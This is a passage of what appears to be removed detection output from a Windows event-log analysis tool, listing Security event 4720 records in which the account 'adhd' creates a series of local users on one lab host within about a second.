-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:01.0821351Z'/&gt;&lt;EventRecordID&gt;4663&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Debra&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1103&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Debra&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Debra</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4657</recordid>
-            <time>2020-06-11 22:05:00.979538200Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:00.9795382Z'/&gt;&lt;EventRecordID&gt;4657&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Hannah&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1102&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Hannah&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Hannah</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4651</recordid>
-            <time>2020-06-11 22:05:00.906114600Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:00.9061146Z'/&gt;&lt;EventRecordID&gt;4651&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Justin&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1101&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Justin&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Justin</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4645</recordid>
-            <time>2020-06-11 22:05:00.809700100Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:00.8097001Z'/&gt;&lt;EventRecordID&gt;4645&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Brenda&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1100&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Brenda&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Brenda</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4639</recordid>
-            <time>2020-06-11 22:05:00.628014300Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:00.6280143Z'/&gt;&lt;EventRecordID&gt;4639&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Diane&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1099&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Diane&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Diane</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4633</recordid>
-            <time>2020-06-11 22:05:00.533536900Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:00.5335369Z'/&gt;&lt;EventRecordID&gt;4633&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Billy&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1098&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Billy&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Billy</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4627</recordid>
-            <time>2020-06-11 22:05:00.455572300Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:00.4555723Z'/&gt;&lt;EventRecordID&gt;4627&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Megan&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1097&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Megan&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Megan</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4621</recordid>
-            <time>2020-06-11 22:05:00.373644300Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:00.3736443Z'/&gt;&lt;EventRecordID&gt;4621&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Zachary&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1096&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Zachary&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Zachary</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4615</recordid>
-            <time>2020-06-11 22:05:00.266796400Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:00.2667964Z'/&gt;&lt;EventRecordID&gt;4615&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Diana&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1095&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Diana&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Diana</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4609</recordid>
-            <time>2020-06-11 22:05:00.185004300Z</time>
-            <channel>Security</channel>
